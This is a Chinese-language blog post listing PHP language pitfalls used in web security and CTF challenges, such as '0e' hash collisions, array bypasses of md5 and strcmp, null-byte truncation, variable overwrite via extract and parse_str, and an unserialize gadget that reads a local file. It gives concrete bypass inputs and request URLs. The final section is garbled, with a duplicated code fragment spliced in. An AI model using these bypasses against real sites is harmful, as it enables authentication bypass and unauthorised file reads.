PHP函數一些漏洞集合分享

本文主要和大家分享PHP函數一些漏洞集合分享，希望能協助到大家。

1.弱類型比較

2.MD5 compare漏洞

PHP在處理雜湊字串時，如果利用”!=”或”==”來對雜湊值進行比較，它把每一個以”0x”開頭的雜湊值都解釋為科學計數法0的多少次方（為0），所以如果兩個不同的密碼經過雜湊以後，其雜湊值都是以”0e”開頭的，那麼php將會認為他們相同。
常見的payload有

0x01 md5(str)    QNKCDZO    240610708    s878926199a    s155964671a    s214587387a    s214587387a0x02 sha1(str)    sha1('aaroZmOk')      sha1('aaK1STfY')    sha1('aaO8zKZF')    sha1('aa3OFF9m')

同時MD5不能處理數組，若有以下判斷則可用數組繞過

if(@md5($_GET['a']) == @md5($_GET['b'])){    echo "yes";}//http://127.0.0.1/1.php?a[]=1&b[]=2

3.ereg函數漏洞：00截斷

ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE

字串對比解析
在這裡如果 $_GET[‘password’]為數組，則傳回值為NULL
如果為123 || asd || 12as || 123%00&&&**，則傳回值為true
其餘為false

4.$key是什嗎？

別忘記程式可以把變數本身的key也當變數提取給函數處理。

<?php    print_r(@$_GET);     foreach ($_GET AS $key => $value)    {        print $key."\n";    }?>

5.變數覆蓋

主要涉及到的函數為extract函數，看個例子

<?php      $auth = '0';      // 這裡可以覆蓋$auth的變數值    print_r($_GET);    echo "</br>";    extract($_GET);     if($auth == 1){          echo "private!";      } else{          echo "public!";      }  ?>

extract可以接收數組，然後重新給變數賦值，過程頁很簡單。

同時！PHP的特性$可以用來賦值變數名也能導致變數覆蓋！

<?php      $a='hi';    foreach($_GET as $key => $value) {        echo $key."</br>".$value;        $$key = $value;    }    print "</br>".$a;?>

構造http://127.0.0.1:8080/test.php?a=12 即可達到目的。

6.strcmp

如果 str1 小於 str2 返回 < 0； 如果 str1 大於 str2 返回 > 0；如果兩者相等，返回 0。 先將兩個參數先轉換成string類型。 當比較數組和字串的時候，返回是0。 如果參數不是string類型，直接return

<?php    $password=$_GET['password'];    if (strcmp('xd',$password)) {     echo 'NO!';    } else{        echo 'YES!';    }?>

構造http://127.0.0.1:8080/test.php?password[]=

7.is_numeric

無需多言：

<?phpecho is_numeric(233333);       # 1echo is_numeric('233333');    # 1echo is_numeric(0x233333);    # 1echo is_numeric('0x233333');   # 1echo is_numeric('233333abc');  # 0?>

8.preg_match

如果在進行Regex匹配的時候，沒有限制字串的開始和結束(^ 和 $)，則可以存在繞過的問題

<?php$ip = 'asd 1.1.1.1 abcd'; // 可以繞過if(!preg_match("/(\d+)\.(\d+)\.(\d+)\.(\d+)/",$ip)) {  die('error');} else {   echo('key...');}?>

9.parse_str

與 parse_str() 類似的函數還有 mb_parse_str()，parse_str 將字串解析成多個變數，如果參數str是URL傳遞入的查詢字串（query string），則將它解析為變數並設定到當前範圍。
時變數覆蓋的一種

<?php    $var='init';      print $var."</br>";    parse_str($_SERVER['QUERY_STRING']);      echo $_SERVER['QUERY_STRING']."</br>";    print $var;?>

10.字串比較

<?php      echo 0 == 'a' ;// a 轉換為數字為 0    重點注意    // 0x 開頭會被當成16進位54975581388的16進位為 0xccccccccc    // 十六進位與整數，被轉換為同一進位比較    '0xccccccccc' == '54975581388' ;    // 字串在與數字比較前會自動轉換為數字，如果不能轉換為數字會變成0    1 == '1';    1 == '01';    10 == '1e1';    '100' == '1e2' ;        // 十六進位數與帶空格十六進位數，被轉換為十六進位整數    '0xABCdef'  == '     0xABCdef';    echo '0010e2' == '1e3';    // 0e 開頭會被當成數字，又是等於 0*10^xxx=0    // 如果 md5 是以 0e 開頭，在做比較的時候，可以用這種方法繞過    '0e509367213418206700842008763514' == '0e481036490867661113260034900752';    '0e481036490867661113260034900752' == '0' ;    var_dump(md5('240610708') == md5('QNKCDZO'));    var_dump(md5('aabg7XSs') == md5('aabC9RqS'));    var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));    var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));?>

11.unset

unset(bar);用來銷毀指定的變數，如果變數bar 包含在請求參數中，可能出現銷毀一些變數而實現程式邏輯繞過。

<?php  $_CONFIG['extraSecure'] = true;foreach(array('_GET','_POST') as $method) {    foreach($$method as $key=>$value) {      // $key == _CONFIG      // $$key == $_CONFIG      // 這個函數會把 $_CONFIG 變數銷毀      unset($$key);    }}if ($_CONFIG['extraSecure'] == false) {    echo 'flag {****}';}?>

12.intval()

int轉string：

$var = 5;  方式1：$item = (string)$var;  方式2：$item = strval($var);

string轉int：intval()函數。

var_dump(intval('2')) //2  var_dump(intval('3abcd')) //3  var_dump(intval('abcd')) //0 可以使用字串-0轉換，來自於wechall的方法

說明intval()轉換的時候，會將從字串的開始進行轉換直到遇到一個非數位字元。即使出現無法轉換的字串，intval()不會報錯而是返回0
順便說一下，intval可以被%00截斷

if($req['number']!=strval(intval($req['number']))){     $info = "number must be equal to it's integer!! ";  }

如果當$req[‘number’]=0%00即可繞過

13.switch()

如果switch是數字類型的case的判斷時，switch會將其中的參數轉換為int類型，效果相當於intval函數。如下：

<?php    $i ="abc";      switch ($i) {      case 0:      case 1:      case 2:      echo "i is less than 3 but not negative";      break;      case 3:      echo "i is 3";      } ?>

14.in_array()

$array=[0,1,2,'3'];  var_dump(in_array('abc', $array)); //true  var_dump(in_array('1bc', $array)); //true

在所有php認為是int的地方輸入string，都會被強制轉換

15.serialize 和 unserialize漏洞

這裡我們先簡單介紹一下php中的魔術方法（這裡如果對於類、對象、方法不熟的先去學學吧），即Magic方法，php類可能會包含一些特殊的函數叫magic函數，magic函數命名是以符號__開頭的，比如 __construct， __destruct，__toString，__sleep，__wakeup等等。這些函數都會在某些特殊時候被自動調用。 例如__construct()方法會在一個對象被建立時自動調用，對應的__destruct則會在一個對象被銷毀時調用等等。 這裡有兩個比較特別的Magic方法，__sleep 方法會在一個對象被序列化的時候調用。 __wakeup方法會在一個對象被還原序列化的時候調用。

<?phpclass test{    public $username = '';    public $password = '';    public $file = '';    public function out(){        echo "username: ".$this->username."<br>"."password: ".$this->password ;    }     public function __toString() {        return file_get_contents($this->file);    }}$a = new test();$a->file = 'C:\Users\YZ\Desktop\plan.txt';echo serialize($a);?>//tostring方法會在輸出執行個體的時候執行，如果執行個體路徑是隱秘檔案就可以讀取了

echo unserialize觸發了__tostring函數，下面就可以讀取了C:\Users\YZ\Desktop\plan.txt檔案了

<?phpclass test{    public $username = '';    public $password = '';    public $file = '';    public function out(){        echo "username: ".$this->username."<br>"."password: ".$this->password ;    }     public function __toString() {        return file_get_contents($this->file);    }}$a = 'O:4:"test":3:{s:8:"username";s:0:"";s:8:"password";s:0:"";s:4:"file";s:28:"C:\Users\YZ\Desktop\plan.txt";}';echo unserialize($a);?>

16.session 還原序列化漏洞

主要原因是
ini_set(‘session.serialize_handler’, ‘php_serialize’);
ini_set(‘session.serialize_handler’, ‘php’);
兩者處理session的方式不同 \Users\YZ\Desktop\plan.txt";}';echo unserialize($a);?>

16.session 還原序列化漏洞

主要原因是
ini_set(‘session.serialize_handler’, ‘php_serialize’);
ini_set(‘session.serialize_handler’, ‘php’);
兩者處理session的方式不同
相關推薦：

php網站常見的一些安全性漏洞及相應防範措施

php關於還原序列化對象注入漏洞

有關檔案漏洞的文章推薦9篇